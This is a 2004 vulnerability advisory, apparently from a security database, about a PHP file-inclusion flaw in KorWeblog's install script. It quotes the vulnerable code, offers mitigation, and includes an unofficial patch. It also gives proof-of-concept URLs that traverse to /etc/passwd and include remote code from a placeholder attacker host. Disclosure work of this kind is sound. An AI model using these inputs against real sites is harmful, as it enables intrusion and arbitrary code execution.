KorWeblog php injection Vulnerability

2005-01-02T00:00:00
ID SECURITYVULNS:DOC:7471
Type securityvulns
Reporter Securityvulns
Modified 2005-01-02T00:00:00

Description

KorWeblog php injection Vulnerability

Release Date : 2004/12/31 (KST) Author : Mins (mins at fsu.or.kr) Product : KorWeblog http://weblog.kldp.org Vendor-Status: Vendor was contacted but I could not receive reply message. Vendor-Patches: None Impact: Attacker can execute arbitrary php code.

Summary

KorWeblog is one of popular blog system in Korea. The "lng" parameter in "/install/index.php" isn't properly verified, before it is used to include files. And Attacker does not need "register_globals=On". So this vulnerability would allow remote user to inject php codes.

Affected Products

korweblog 1.6.2-cvs and prior

  • 1st case php.ini : magic_quotes_gpc = Off

  • 2nd case php.ini : magic_quotes_gpc = On

  • 3rd case php.ini : allow_url_fopen : On

Vendor Status : NOT FIXED

2004-12-23 Vulnerability found 2004-12-26 Notified vendor. 2004-12-27 Could not receive reply message. 2004-12-27 Mins made temporary patch. 2004-12-29 2nd vendor Contact. 2004-12-30 Release of unoffical patch. 2004-12-31 Offical advisory release.

Details

If "/install/index.php" exists, attacker can execute arbitrary php code.

Part of weak source (/install/index.php)

ini_set('magic_quotes_gpc',1); ini_set('magic_quotes_sybase',0);

include("../include/misc.inc.php"); include("../include/sql.inc.php"); include("include/check.inc.php");

if(!ini_get("register_globals")) { include("include/grab_globals.inc.php"); }

  $url =

eregi_replace("(/install/|/install)$","",F_GetBaseURL()); $path = eregi_replace("(/install/|/install)$","",dirname($_SERVER['SCRIPT_FILENAME']));

  $G_VER = "1.6.2";

  if (!empty($lng)) include("lang/$lng" . ".php");

Keep in mind that the setting magic_quotes_gpc will not work at runtime. When the "magic_quotes_gpc" is 'Off', attacker can add '%00' to '$lng'.

However if "magic_quotes_gpc" is 'On', attacker can open only '.php' file. That's right. But attacker is able to use another file.

Part of another same package source (/include/main.inc.php)

if (eregi("main.inc.php", $_SERVER['PHP_SELF'])) die ("You can not access this file directly...");

set_magic_quotes_runtime(0); ini_set('magic_quotes_gpc',1); ini_set('magic_quotes_sybase',0);

include("$G_PATH/include/sql.inc.php"); include("$G_PATH/include/layout.inc.php"); include("$G_PATH/include/parser.inc.php");

Proof of Concepts

  • 1st case php.ini : register_globals = On, magic_quotes_gpc = Off http://[victim]/weblog/install/index.php?lng=../../../../../../etc/passwd%00

  • 2nd case php.ini : register_globals = On http://[victim]/weblog/install/index.php?lng=../../phpinfo

  • 3rd case php.ini : register_globals = On, allow_url_fopen : On http://[victim]/weblog/install/index.php?lng=../../include/main.inc&G_PATH=http://[hacker]

Solution

  • remove the install file

  • Set "allow_url_fopen" to "Off".

  • unoffical patch mins@hackme:~/public_html/korweblog-1.6.1/install$ cat index.diff --- index_1_6_1.php Mon Dec 27 17:31:50 2004 +++ index.php Mon Dec 27 17:40:51 2004 @@ -18,7 +18,10 @@

$G_VER = "1.6.1";

-if (!empty($lng)) include("lang/$lng" . ".php"); +if (!empty($lng)) { + if (eregi("\.\.",$lng) || eregi("/",$lng)) $lng="korean"; + include("lang/$lng" . ".php"); +}

$sql_form ="<P> <TABLE><TR><TD COLSPAN=2><B>". _SQL_INPUT ."</B></TD>

Credits

Mins at FSU (mins at fsu.or.kr)